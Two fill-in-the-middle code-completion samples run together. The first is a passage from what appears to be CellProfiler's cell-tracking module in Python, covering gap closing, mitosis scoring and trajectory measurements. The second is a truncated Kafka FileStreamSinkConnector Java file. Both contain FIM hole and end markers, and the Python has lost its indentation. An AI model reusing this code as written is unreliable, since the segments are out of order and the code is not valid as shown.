# y[i] gives index of last hooked to first
#
b[i+1] = yi+1
c[yi+1] = i+1
#
# Hook our parent image/object number to found parent
#
parent_image_index = int(L[yi, IIDX])
parent_object_number = int(L[yi, ONIDX])
parent_image_number = image_numbers[parent_image_index]
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_GAP)
add_fixup(F_GAP_LENGTH, my_image_number, my_object_number,
my_image_index - parent_image_index)
add_fixup(F_GAP_SCORE, my_image_number, my_object_number,
scores[yi])
#
# One less new object
#
new_object_count[my_image_index] -= 1
#
# One less lost object (the lost object is recorded in
# the image set after the parent)
#
lost_object_count[parent_image_index + 1] -= 1
logger.debug("Gap closing: %d:%d to %d:%d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[my_image_index],
object_numbers[my_image_index][my_object_index],
score_matrix[yi, i]))
elif yi >= split_off and yi < split_end:
#------------------------------------
#
# SPLIT
#
p2_idx = split_p2idx[yi - split_off]
parent_image_index = int(P2[p2_idx, IIDX])
parent_image_number = image_numbers[parent_image_index]
parent_object_number = int(P2[p2_idx, ONIDX])
b[i+1] = P2[p2_idx, LIDX]
c[b[i+1]] = i+1
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_SPLIT)
add_fixup(F_SPLIT_SCORE, my_image_number, my_object_number,
split_scores[yi - split_off])
#
# one less new object
#
new_object_count[my_image_index] -= 1
#
# one more split object
#
split_count[my_image_index] += 1
logger.debug("split: %d:%d to %d:%d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[my_image_index],
object_numbers[my_image_index][my_object_index],
split_scores[y[i] - split_off]))
#---------------------
#
# Process ends (parents)
#
end_idxs = np.where(
x[:start_end_end] != np.arange(gap_off, gap_end))[0]
for i in end_idxs:
if(x[i] < start_end_end):
a[i+1] = x[i]+1
d[a[i+1]] = i+1
elif(x[i] >= merge_off and x[i] < merge_end):
#-------------------
#
# MERGE
#
# Handle merged objects. A merge hooks the end (L) of
# a segment (the parent) to a gap alternative in P1 (the child)
#
p1_idx = merge_p1idx[x[i]-merge_off]
a[i+1] = P1[p1_idx, LIDX]
d[a[i+1]] = i+1
parent_image_index = int(L[i, IIDX])
parent_object_number = int(L[i, ONIDX])
parent_image_number = image_numbers[parent_image_index]
child_image_index = int(P1[p1_idx, IIDX])
child_object_number = int(P1[p1_idx, ONIDX])
relationships.append(
((parent_image_index, parent_object_number),
(child_image_index, child_object_number)))
add_fixup(F_MERGE_SCORE, parent_image_number,
parent_object_number,
merge_scores[x[i] - merge_off])
lost_object_count[parent_image_index+1] -= 1
merge_count[child_image_index] += 1
logger.debug("Merge: %d:%d to %d:%d, score=%f" %
(image_numbers[parent_image_index]
, parent_object_number,
image_numbers[child_image_index],
child_object_number,
merge_scores[x[i] - merge_off]))
for (mlidx, mridx, mpidx), score in\
zip(good_mitoses, good_mitosis_scores):
#
# The parent is attached, one less lost object
#
lost_object_count[int(L[mpidx, IIDX])+1] -= 1
a[mpidx+1] = F[mlidx, LIDX]
d[a[mpidx+1]] = mpidx+1
parent_image_index = int(L[mpidx, IIDX])
parent_image_number = image_numbers[parent_image_index]
parent_object_number = int(L[mpidx, ONIDX])
split_count[int(F[lidx, IIDX])] += 1
for idx in mlidx, mridx:
#--------------------------------------
#
# MITOSIS child
#
my_image_index = int(F[idx, IIDX])
my_image_number = image_numbers[my_image_index]
my_object_index = int(F[idx, OIIDX])
my_object_number = int(F[idx, ONIDX])
b[idx+1] = int(L[mpidx, LIDX])
c[b[idx+1]] = idx+1
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_MITOSIS)
add_fixup(F_MITOSIS_SCORE, my_image_number, my_object_number,
score)
new_object_count[my_image_index] -= 1
logger.debug("Mitosis: %d:%d to %d:%d and %d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[F[mlidx, IIDX]],
F[mlidx, ONIDX],
F[mridx, ONIDX],
score))
#
# At this point a gives the label # of the track that connects
# to the end of the indexed track. b gives the label # of the
# track that connects to the start of the indexed track.
# We convert these into edges.
#
# aa and bb are the vertices of an edge list and aa[i],bb[i]
# make up an edge
#
connect_mask = (a != -1)
aa = a[connect_mask]
bb = np.argwhere(connect_mask).flatten()
connect_mask = (b != -1)
aa = np.hstack((aa, b[connect_mask]))
bb = np.hstack((bb, np.argwhere(connect_mask).flatten()))
#
# Connect self to self for indices that do not connect
#
disconnect_mask = (a == -1) & (b == -1)
aa = np.hstack((aa, np.argwhere(disconnect_mask).flatten()))
bb = np.hstack((bb, np.argwhere(disconnect_mask).flatten()))
z = all_connected_components(aa, bb)
newlabel = [z[label[i]] for i in range(len(label))]
#
# Replace the labels for the image sets in the group
# inside the list retrieved from the measurements
#
m_link_type = self.measurement_name(F_LINK_TYPE)
for i, image_number in enumerate(image_numbers):
n_objects = len(newlabel[i])
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_LOST_OBJECT_COUNT),
lost_object_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_NEW_OBJECT_COUNT),
new_object_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_MERGE_COUNT),
merge_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_SPLIT_COUNT),
split_count[i], True, image_number)
if n_objects == 0:
continue
m.add_measurement(object_name,
self.measurement_name(F_LABEL),
newlabel[i], can_overwrite = True,
image_set_number = image_number)
m.add_measurement(object_name,
self.measurement_name(F_PARENT_IMAGE_NUMBER),
parent_image_numbers[i],
can_overwrite = True,
image_set_number = image_number)
m.add_measurement(object_name,
self.measurement_name(F_PARENT_OBJECT_NUMBER),
parent_object_numbers[i],
can_overwrite = True,
image_set_number = image_number)
is_fixups = fixups.get(image_number, None)
if (is_fixups is not None) and (F_LINK_TYPE in is_fixups):
link_types = m[object_name, m_link_type, image_number]
object_numbers, values = [
np.array(_) for _ in is_fixups[F_LINK_TYPE]]
link_types[object_numbers-1] = values
m[object_name, m_link_type, image_number] = link_types
for feature, data_type in (
(F_GAP_LENGTH, np.int32),
(F_GAP_SCORE, np.float32),
(F_MERGE_SCORE, np.float32),
(F_SPLIT_SCORE, np.float32),
(F_MITOSIS_SCORE, np.float32)):
if data_type == np.int32:
values = np.zeros(n_objects, data_type)
else:
values = np.ones(n_objects, data_type) * np.NaN
if (is_fixups is not None) and (feature in is_fixups):
object_numbers, fixup_values = [
np.array(_) for _ in is_fixups[feature]]
values[object_numbers-1] = fixup_values
m[object_name, self.measurement_name(feature), image_number] =\
values
#
# Write the relationships.
#
if len(relationships) > 0:
relationships = np.array(relationships)
parent_image_numbers = image_numbers[relationships[:, 0, 0]]
child_image_numbers = image_numbers[relationships[:, 1, 0]]
parent_object_numbers = relationships[:, 0, 1]
child_object_numbers = relationships[:, 1, 1]
m.add_relate_measurement(
self.module_num, R_PARENT, object_name, object_name,
parent_image_numbers, parent_object_numbers,
child_image_numbers, child_object_numbers)
self.recalculate_group(workspace, image_numbers)
def calculate_area_penalty(self, a1, a2):
'''Calculate a penalty for areas that don't match
Ideally, area should be conserved while tracking. We divide the larger
of the two by the smaller of the two to get the area penalty
which is then multiplied by the distance.
Note that this differs from Jaqaman eqn 5 which has an asymmetric
penalty (sqrt((a1 + a2) / b) for a1+a2 > b and b / (a1 + a2) for
a1+a2 < b. I can't think of a good reason why they should be
asymmetric.
'''
result = a1 / a2
result[result < 1] = 1/result[result < 1]
result[np.isnan(result)] = np.inf
return result
def get_gap_pair_scores(self, F, L, max_gap):
'''Compute scores for matching last frame with first to close gaps
F - an N x 3 (or more) array giving X, Y and frame # of the first object
in each track
L - an N x 3 (or more) array giving X, Y and frame # of the last object
in each track
max_gap - the maximum allowed # of frames between the last and first
Returns: an M x 2 array of M pairs where the first element of the array
is the index of the track whose last frame is to be joined to
the track whose index is the second element of the array.
an M-element vector of scores.
'''
#
# There have to be at least two things to match
#
nothing = (np.zeros((0, 2), int), np.zeros(0))
if F.shape[0] <= 1:
return nothing
X = 0
Y = 1
IIDX = 2
AIDX = 6
#
# Create an indexing ordered by the last frame index and by the first
#
i = np.arange(len(F))
j = np.arange(len(F))
f_iidx = F[:, IIDX].astype(int)
l_iidx = L[:, IIDX].astype(int)
i_lorder = np.lexsort((i, l_iidx))
j_forder = np.lexsort((j, f_iidx))
i = i[i_lorder]
j = j[j_forder]
i_counts = np.bincount(l_iidx)
j_counts = np.bincount(f_iidx)
i_indexes = Indexes([i_counts])
j_indexes = Indexes([j_counts])
#
# The lowest possible F for each L is 1+L
#
j_self = np.minimum(np.arange(len(i_counts)),
len(j_counts) - 1)
j_first_idx = j_indexes.fwd_idx[j_self] + j_counts[j_self]
#
# The highest possible F for each L is L + max_gap. j_end is the
# first illegal value... just past that.
#
j_last = np.minimum(np.arange(len(i_counts)) + max_gap,
len(j_counts)-1)
j_end_idx = j_indexes.fwd_idx[j_last] + j_counts[j_last]
#
# Structure the i and j block ranges
#
ij_counts = j_end_idx - j_first_idx
ij_indexes = Indexes([i_counts, ij_counts])
if ij_indexes.length == 0:
return nothing
#
# The index into L of the first element of the pair
#
ai = i[i_indexes.fwd_idx[ij_indexes.rev_idx] + ij_indexes.idx[0]]
#
# The index into F of the second element of the pair
#
aj = j[j_first_idx[ij_indexes.rev_idx] + ij_indexes.idx[1]]
#
# The distances
#
d = np.sqrt((L[ai, X] - F[aj, X]) ** 2 +
(L[ai, Y] - F[aj, Y]) ** 2)
#
# Rho... the area penalty
#
rho = self.calculate_area_penalty(L[ai, AIDX], F[aj, AIDX])
return np.column_stack((ai, aj)), d * rho
def get_mitotic_triple_scores(self, F, L):
'''Compute scores for matching a parent to two daughters
F - an N x 3 (or more) array giving X, Y and frame # of the first object
in each track
L - an N x 3 (or more) array giving X, Y and frame # of the last object
in each track
Returns: an M x 3 array of M triples where the first column is the
index in the L array of the parent cell and the remaining
columns are the indices of the daughters in the F array
an M-element vector of distances of the parent from the expected
'''
X = 0
Y = 1
IIDX = 2
AIDX = 6
if len(F) <= 1:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
max_distance = self.mitosis_max_distance.value
# Find all daughter pairs within same frame
i, j = np.where(F[:, np.newaxis, IIDX] == F[np.newaxis, :, IIDX])
i, j = i[i < j], j[i < j] # get rid of duplicates and self-compares
#
# Calculate the maximum allowed distance before one or the other
# daughter is farther away than the maximum allowed from the center
#
# That's the max_distance * 2 minus the distance
#
dmax = max_distance * 2 - np.sqrt(np.sum((F[i, :2] - F[j, :2]) ** 2, 1))
mask = dmax >= 0
i, j = i[mask], j[mask]
if len(i) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
center_x = (F[i, X] + F[j, X]) / 2
center_y = (F[i, Y] + F[j, Y]) / 2
frame = F[i, IIDX]
# Find all parent-daughter pairs where the parent
# is in the frame previous to the daughters
ij, k = [_.flatten() for _ in np.mgrid[0:len(i), 0:len(L)]]
mask = F[i[ij], IIDX] == L[k, IIDX]+1
ij, k = ij[mask], k[mask]
if len(ij) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
d = np.sqrt((center_x[ij] - L[k, X]) ** 2 +
(center_y[ij] - L[k, Y]) ** 2)
mask = d <= dmax[ij]
ij, k, d = ij[mask], k[mask], d[mask]
if len(ij) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
rho = self.calculate_area_penalty(
F[i[ij], AIDX] + F[j[ij], AIDX], L[k, AIDX])
return np.column_stack((i[ij], j[ij], k)), d * rho
def recalculate_group(self, workspace, image_numbers):
'''Recalculate all measurements once post_group has run
workspace - the workspace being operated on
image_numbers - the image numbers of the group's image sets' measurements
'''
m = workspace.measurements
object_name = self.object_name.value
assert isinstance(m, cpmeas.Measurements)
image_index = np.zeros(np.max(image_numbers)+1, int)
image_index[image_numbers] = np.arange(len(image_numbers))
image_index[0] = -1
index_to_imgnum = np.array(image_numbers)
parent_image_numbers, parent_object_numbers = [
[ m.get_measurement(
object_name, self.measurement_name(feature), image_number)
for image_number in image_numbers]
for feature in (F_PARENT_IMAGE_NUMBER, F_PARENT_OBJECT_NUMBER)]
#
# Do all_connected_components on the graph of parents to find groups
# that share the same ancestor
#
count = np.array([len(x) for x in parent_image_numbers])
idx = Indexes(count)
if idx.length == 0:
# Nothing to do
return
parent_image_numbers = np.hstack(parent_image_numbers).astype(int)
parent_object_numbers = np.hstack(parent_object_numbers).astype(int)
parent_image_indexes = image_index[parent_image_numbers]
parent_object_indexes = parent_object_numbers - 1
i = np.arange(idx.length)
i = i[parent_image_numbers != 0]
j = idx.fwd_idx[parent_image_indexes[i]] + parent_object_indexes[i]
# Link self to self too
i = np.hstack((i, np.arange(idx.length)))
j = np.hstack((j, np.arange(idx.length)))
labels = all_connected_components(i, j)
nlabels = np.max(labels) + 1
#
# Set the ancestral index for each label
#
ancestral_index = np.zeros(nlabels, int)
ancestral_index[labels[parent_image_numbers == 0]] =\
np.argwhere(parent_image_numbers == 0).flatten().astype(int)
ancestral_image_index = idx.rev_idx[ancestral_index]
ancestral_object_index = \
ancestral_index - idx.fwd_idx[ancestral_image_index]
#
# Blow these up to one per object for convenience
#
ancestral_index = ancestral_index[labels]
ancestral_image_index = ancestral_image_index[labels]
ancestral_object_index = ancestral_object_index[labels]
def start(image_index):
'''Return the start index in the array for the given image index'''
return idx.fwd_idx[image_index]
def end(image_index):
'''Return the end index in the array for the given image index'''
return start(image_index) + idx.counts[0][image_index]
def slyce(image_index):
return slice(start(image_index), end(image_index))
class wrapped(object):
'''make an indexable version of a measurement, with parent and ancestor fetching'''
def __init__(self, feature_name):
self.feature_name = feature_name
self.backing_store = np.hstack([
m.get_measurement(object_name, feature_name, i)
for i in image_numbers])
def __getitem__(self, index):
return self.backing_store[slyce(index)]
def __setitem__(self, index, val):
self.backing_store[slyce(index)] = val
m.add_measurement(object_name, self.feature_name, val,
image_set_number = image_numbers[index],
can_overwrite=True)
def get_parent(self, index, no_parent=None):
result = np.zeros(idx.counts[0][index],
self.backing_store.dtype)
my_slice = slyce(index)
mask = parent_image_numbers[my_slice] != 0
if not np.all(mask):
if np.isscalar(no_parent) or (no_parent is None):
result[~mask] = no_parent
else:
result[~mask] = no_parent[~mask]
if np.any(mask):
result[mask] = self.backing_store[
idx.fwd_idx[parent_image_indexes[my_slice][mask]] +
parent_object_indexes[my_slice][mask]]
return result
def get_ancestor(self, index):
return self.backing_store[ancestral_index[slyce(index)]]
#
# Recalculate the trajectories
#
x = wrapped(M_LOCATION_CENTER_X)
y = wrapped(M_LOCATION_CENTER_Y)
trajectory_x = wrapped(self.measurement_name(F_TRAJECTORY_X))
trajectory_y = wrapped(self.measurement_name(F_TRAJECTORY_Y))
integrated = wrapped(self.measurement_name(F_INTEGRATED_DISTANCE))
dists = wrapped(self.measurement_name(F_DISTANCE_TRAVELED))
displ = wrapped(self.measurement_name(F_DISPLACEMENT))
linearity = wrapped(self.measurement_name(F_LINEARITY))
lifetimes = wrapped(self.measurement_name(F_LIFETIME))
label = wrapped(self.measurement_name(F_LABEL))
final_age = wrapped(self.measurement_name(F_FINAL_AGE))
age = {} # Dictionary of per-label ages
if self.wants_lifetime_filtering.value:
minimum_lifetime = self.min_lifetime.value if self.wants_minimum_lifetime.value else -np.Inf
maximum_lifetime = self.max_lifetime.value if self.wants_maximum_lifetime.value else np.Inf
for image_number in image_numbers:
index = image_index[image_number]
this_x = x[index]
if len(this_x) == 0:
continue
this_y = y[index]
last_x = x.get_parent(index, no_parent=this_x)
last_y = y.get_parent(index, no_parent=this_y)
x_diff = this_x - last_x
y_diff = this_y - last_y
#
# TrajectoryX,Y = X,Y distances traveled from step to step
#
trajectory_x[index] = x_diff
trajectory_y[index] = y_diff
#
# DistanceTraveled = Distance traveled from step to step
#
dists[index] = np.sqrt(x_diff * x_diff + y_diff * y_diff)
#
# Integrated distance = accumulated distance for lineage
#
integrated[index] = integrated.get_parent(index, no_parent=0) + dists[index]
#
# Displacement = crow-fly distance from initial ancestor
#
x_tot_diff = this_x - x.get_ancestor(index)
y_tot_diff = this_y - y.get_ancestor(index)
tot_distance = np.sqrt(x_tot_diff * x_tot_diff +
y_tot_diff * y_tot_diff)
displ[index] = tot_distance
#
# Linearity = ratio of displacement and integrated
# distance. NaN for new cells is ok.
#
linearity[index] = tot_distance / integrated[index]
#
# Add 1 to lifetimes / one for new
#
lifetimes[index] = lifetimes.get_parent(index, no_parent=0) + 1
#
# Age = overall lifetime of each label
#
for this_label, this_lifetime in zip(label[index],lifetimes[index]):
age[this_label] = this_lifetime
all_labels = age.keys()
all_ages = age.values()
if self.wants_lifetime_filtering.value:
labels_to_filter = [k for k, v in age.iteritems() if v <= minimum_lifetime or v >= maximum_lifetime]
for image_number in image_numbers:
index = image_index[image_number]
# Fill in final object ages
this_label = label[index]
this_lifetime = lifetimes[index]
this_age = final_age[index]
ind = np.array(all_labels).searchsorted(this_label)
i = np.array(all_ages)[ind] == this_lifetime
this_age[i] = this_lifetime[i]
final_age[index] = this_age
# Filter object ages below the minimum
if self.wants_lifetime_filtering.value:
if len(labels_to_filter) > 0:
this_label = label[index].astype(float)
this_label[np.in1d(this_label,np.array(labels_to_filter))] = np.NaN
label[index] = this_label
m.add_experiment_measurement(F_EXPT_ORIG_NUMTRACKS, nlabels)
if self.wants_lifetime_filtering.value:
m.add_experiment_measurement(F_EXPT_FILT_NUMTRACKS, nlabels-len(labels_to_filter))
def map_objects(self, workspace, new_of_old, old_of_new, i, j):
'''Record the mapping of old to new objects and vice-versa
workspace - workspace for current image set
new_to_old - an array of the new labels for every old label
old_to_new - an array of the old labels for every new label
i, j - the coordinates for each new object.
'''
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
image_number = m.get_current_image_measurement(cpp.IMAGE_NUMBER)
new_of_old = new_of_old.astype(int)
old_of_new = old_of_new.astype(int)
old_object_numbers = self.get_saved_object_numbers(workspace).astype(int)
max_object_number = self.get_max_object_number(workspace)
old_count = len(new_of_old)
new_count = len(old_of_new)
#
# Record the new objects' parents
#
parents = old_of_new.copy()
parents[parents != 0] =\
old_object_numbers[(old_of_new[parents!=0]-1)].astype(parents.dtype)
self.add_measurement(workspace, F_PARENT_OBJECT_NUMBER, old_of_new)
parent_image_numbers = np.zeros(len(old_of_new))
parent_image_numbers[parents != 0] = image_number - 1
self.add_measurement(workspace, F_PARENT_IMAGE_NUMBER,
parent_image_numbers)
#
# Assign object IDs to the new objects
#
mapping = np.zeros(new_count, int)
if old_count > 0 and new_count > 0:
mapping[old_of_new != 0] = \
old_object_numbers[old_of_new[old_of_new != 0] - 1]
miss_count = np.sum(old_of_new == 0)
lost_object_count = np.sum(new_of_old == 0)
else:
miss_count = new_count
lost_object_count = old_count
nunmapped = np.sum(mapping==0)
new_max_object_number = max_object_number + nunmapped
mapping[mapping == 0] = np.arange(max_object_number+1,
new_max_object_number + 1)
self.set_max_object_number(workspace, new_max_object_number)
self.add_measurement(workspace, F_LABEL, mapping)
self.set_saved_object_numbers(workspace, mapping)
#
# Compute distances and trajectories
#
diff_i = np.zeros(new_count)
diff_j = np.zeros(new_count)
distance = np.zeros(new_count)
integrated_distance = np.zeros(new_count)
displacement = np.zeros(new_count)
linearity = np.ones(new_count)
orig_i = i.copy()
orig_j = j.copy()
old_i, old_j = self.get_saved_coordinates(workspace)
old_distance = self.get_saved_distances(workspace)
old_orig_i, old_orig_j = self.get_orig_coordinates(workspace)
has_old = (old_of_new != 0)
if np.any(has_old):
old_indexes = old_of_new[has_old]-1
orig_i[has_old] = old_orig_i[old_indexes]
orig_j[has_old] = old_orig_j[old_indexes]
diff_i[has_old] = i[has_old] - old_i[old_indexes]
diff_j[has_old] = j[has_old] - old_j[old_indexes]
distance[has_old] = np.sqrt(diff_i[has_old]**2 + diff_j[has_old]**2)
integrated_distance[has_old] = (old_distance[old_indexes] + distance[has_old])
displacement[has_old] = np.sqrt((i[has_old]-orig_i[has_old])**2 + (j[has_old]-orig_j[has_old])**2)
linearity[has_old] = displacement[has_old] / integrated_distance[has_old]
self.add_measurement(workspace, F_TRAJECTORY_X, diff_j)
self.add_measurement(workspace, F_TRAJECTORY_Y, diff_i)
self.add_measurement(workspace, F_DISTANCE_TRAVELED, distance)
self.add_measurement(workspace, F_DISPLACEMENT, displacement)
self.add_measurement(workspace, F_INTEGRATED_DISTANCE, integrated_distance)
self.add_measurement(workspace, F_LINEARITY, linearity)
self.set_saved_distances(workspace, integrated_distance)
self.set_orig_coordinates(workspace, (orig_i, orig_j))
self.set_saved_coordinates(workspace, (i,j))
#
# Update the ages
#
age = np.ones(new_count, int)
if np.any(has_old):
old_age = self.get_saved_ages(workspace)
age[has_old] = old_age[old_of_new[has_old]-1]+1
self.add_measurement(workspace, F_LIFETIME, age)
final_age = np.NaN*np.ones(new_count, float) # Initialize to NaN; will re-calc later
self.add_measurement(workspace, F_FINAL_AGE, final_age)
self.set_saved_ages(workspace, age)
self.set_saved_object_numbers(workspace, mapping)
#
# Add image measurements
#
self.add_image_measurement(workspace, F_NEW_OBJECT_COUNT,
np.sum(parents==0))
self.add_image_measurement(workspace, F_LOST_OBJECT_COUNT,
lost_object_count)
#
# Find parents with more than one child. These are the progenetors
# for daughter cells.
#
if np.any(parents != 0):
h = np.bincount(parents[parents != 0])
split_count = np.sum(h > 1)
else:
split_count = 0
self.add_image_measurement(workspace, F_SPLIT_COUNT, split_count)
#
# Find children with more than one parent. These are the merges
#
if np.any(new_of_old != 0):
h = np.bincount(new_of_old[new_of_old != 0])
merge_count = np.sum(h > 1)
else:
merge_count = 0
self.add_image_measurement(workspace, F_MERGE_COUNT, merge_count)
#########################################
#
# Compile the relationships between children and parents
#
#########################################
last_object_numbers = np.arange(1, len(new_of_old) + 1)
new_object_numbers = np.arange(1, len(old_of_new)+1)
r_parent_object_numbers = np.hstack((
old_of_new[old_of_new != 0],
last_object_numbers[new_of_old != 0]))
r_child_object_numbers = np.hstack((
new_object_numbers[parents != 0], new_of_old[new_of_old != 0]))
if len(r_child_object_numbers) > 0:
#
# Find unique pairs
#
order = np.lexsort((r_child_object_numbers, r_parent_object_numbers))
r_child_object_numbers = r_child_object_numbers[order]
r_parent_object_numbers = r_parent_object_numbers[order]
to_keep = np.hstack((
[True],
(r_parent_object_numbers[1:] != r_parent_object_numbers[:-1]) |
(r_child_object_numbers[1:] != r_child_object_numbers[:-1])))
r_child_object_numbers = r_child_object_numbers[to_keep]
r_parent_object_numbers = r_parent_object_numbers[to_keep]
r_image_numbers = np.ones(
r_parent_object_numbers.shape[0],
r_parent_object_numbers.dtype) * image_number
if len(r_child_object_numbers) > 0:
m.add_relate_measurement(
self.module_num, R_PARENT,
self.object_name.value, self.object_name.value,
r_image_numbers - 1, r_parent_object_numbers,
r_image_numbers, r_child_object_numbers)
def get_kalman_feature_names(self):
if self.tracking_method != TM_LAP:
return []
return sum(
[sum(
[[ kalman_feature(model, F_STATE, element),
kalman_feature(model, F_NOISE, element)] +
[ kalman_feature(model, F_COV, element, e2)
for e2 in elements]
for element in elements],[])
for model, elements in self.get_kalman_models()], [])
def get_measurement_columns(self, pipeline):
result = [(self.object_name.value,
self.measurement_name(feature),
coltype)
for feature, coltype in F_ALL_COLTYPE_ALL]
result += [(cpmeas.IMAGE, self.image_measurement_name(feature), coltype)
for feature, coltype in F_IMAGE_COLTYPE_ALL]
if self.tracking_method == TM_LAP:
result += [( self.object_name.value,
self.measurement_name(name),
coltype) for name, coltype in (
(F_AREA, cpmeas.COLTYPE_INTEGER),
(F_LINK_TYPE, cpmeas.COLTYPE_INTEGER),
(F_LINKING_DISTANCE, cpmeas.COLTYPE_FLOAT),
(F_STANDARD_DEVIATION, cpmeas.COLTYPE_FLOAT),
(F_MOVEMENT_MODEL, cpmeas.COLTYPE_INTEGER))]
result += [( self.object_name.value,
self.measurement_name(name),
cpmeas.COLTYPE_FLOAT) for name in
list(self.get_kalman_feature_names())]
if self.wants_second_phase:
result += [
(self.object_name.value, self.measurement_name(name), coltype)
for name, coltype in (
(F_GAP_LENGTH, cpmeas.COLTYPE_INTEGER),
(F_GAP_SCORE, cpmeas.COLTYPE_FLOAT),
(F_MERGE_SCORE, cpmeas.COLTYPE_FLOAT),
(F_SPLIT_SCORE, cpmeas.COLTYPE_FLOAT),
(F_MITOSIS_SCORE, cpmeas.COLTYPE_FLOAT))]
# Add the post-group attribute to all measurements
attributes = { cpmeas.MCA_AVAILABLE_POST_GROUP: True }
result = [ ( c[0], c[1], c[2], attributes) for c in result]
return result
def get_object_relationships(self, pipeline):
'''Return the object relationships produced by this module'''
object_name = self.object_name.value
if self.wants_second_phase and self.tracking_method == TM_LAP:
when = cpmeas.MCA_AVAILABLE_POST_GROUP
else:
when = cpmeas.MCA_AVAILABLE_EACH_CYCLE
return [(R_PARENT, object_name, object_name, when)]
def get_categories(self, pipeline, object_name):
if object_name in (self.object_name.value, cpmeas.IMAGE):
return [F_PREFIX]
elif object_name == cpmeas.EXPERIMENT:
return [F_PREFIX]
else:
return []
def get_measurements(self, pipeline, object_name, category):
if object_name == self.object_name.value and category == F_PREFIX:
result = list(F_ALL)
if self.tracking_method == TM_LAP:
result += [F_AREA, F_LINKING_DISTANCE, F_STANDARD_DEVIATION,
F_LINK_TYPE, F_MOVEMENT_MODEL]
if self.wants_second_phase:
result += [F_GAP_LENGTH, F_GAP_SCORE, F_MERGE_SCORE,
F_SPLIT_SCORE, F_MITOSIS_SCORE]
result += self.get_kalman_feature_names()
return result
if object_name == cpmeas.IMAGE:
result = F_IMAGE_ALL
return result
if object_name == cpmeas.EXPERIMENT and category == F_PREFIX:
return [F_EXPT_ORIG_NUMTRACKS, F_EXPT_FILT_NUMTRACKS]
return []
def get_measurement_objects(self, pipeline, object_name, category,
measurement):
if (object_name == cpmeas.IMAGE and category == F_PREFIX and
measurement in F_IMAGE_ALL):
return [ self.object_name.value]
return []
def get_measurement_scales(self, pipeline, object_name, category, feature,image_name):
if self.tracking_method == TM_LAP:
return []
if feature in self.get_measurements(pipeline, object_name, category):
return [str(self.pixel_radius.value)]
return []
def upgrade_settings(self, setting_values, variable_revision_number,
module_name, from_matlab):
if from_matlab and variable_revision_number == 3:
wants_image = setting_values[10] != cps.DO_NOT_USE
measurement = '_'.join(setting_values[2:6])
setting_values = [ setting_values[0], # tracking method
setting_values[1], # object name
measurement,
setting_values[6], # pixel_radius
setting_values[7], # display_type
wants_image,
setting_values[10]]
variable_revision_number = 1
from_matlab = False
if (not from_matlab) and variable_revision_number == 1:
setting_values = setting_values + ["100","100"]
variable_revision_number = 2
if (not from_matlab) and variable_revision_number == 2:
# Added phase 2 parameters
setting_values = setting_values + [
"40","40","40","50","50","50","5"]
variable_revision_number = 3
if (not from_matlab) and variable_revision_number == 3:
# Added Kalman choices:
# Model
# radius std
# radius limit
setting_values = (setting_values[:7] +
[ M_BOTH, "3", "2,10"] +
setting_values[9:])
variable_revision_number = 4<|fim▁hole|> variable_revision_number = 5
if (not from_matlab) and variable_revision_number == 5:
# Added mitosis alternative score + mitosis_max_distance
setting_values = setting_values + ["80", "40"]
variable_revision_number = 6
return setting_values, variable_revision_number, from_matlab<|fim▁end|> |
if (not from_matlab) and variable_revision_number == 4:
# Added lifetime filtering: Wants filtering + min/max allowed lifetime
setting_values = setting_values + [cps.NO, cps.YES, "1", cps.NO, "100"] |
<|file_name|>FileStreamSinkConnector.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.file;
import org.apache.kafka.common.config.ConfigDef;
import org.apache.kafka.common.config.ConfigDef.Importance;
import org.apache.kafka.common.config.ConfigDef.Type;
import org.apache.kafka.common.utils.AppInfoParser;
import org.apache.kafka.connect.connector.Task;
import org.apache.kafka.connect.sink.SinkConnector;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* Very simple connector that works with the console. This connector supports both source and
* sink modes via its 'mode' setting.
*/
public class FileStreamSinkConnector extends SinkConnector {
public static final String FILE_CONFIG = "file";
private static final ConfigDef CONFIG_DEF = new ConfigDef()
.define(FILE_CONFIG, Type.STRING, Importance.HIGH, "Destination filename.");
private String filename;
@Override
public String version() {<|fim▁hole|> public void start(Map<String, String> props) {
filename = props.get(FILE_CONFIG);
}
@Override
public Class<? extends Task> taskClass() {
return FileStreamSinkTask.class;
}
@Override
public List<Map<String, String>> taskConfigs(int maxTasks) {
ArrayList<Map<String, String>> configs = new ArrayList<>();
for (int i = 0; i < maxTasks; i++) {
Map<String, String> config = new HashMap<>();
if (filename != null)
config.put(FILE_CONFIG, filename);
configs.add(config);
}
return configs;
}
@Override
public void stop() {
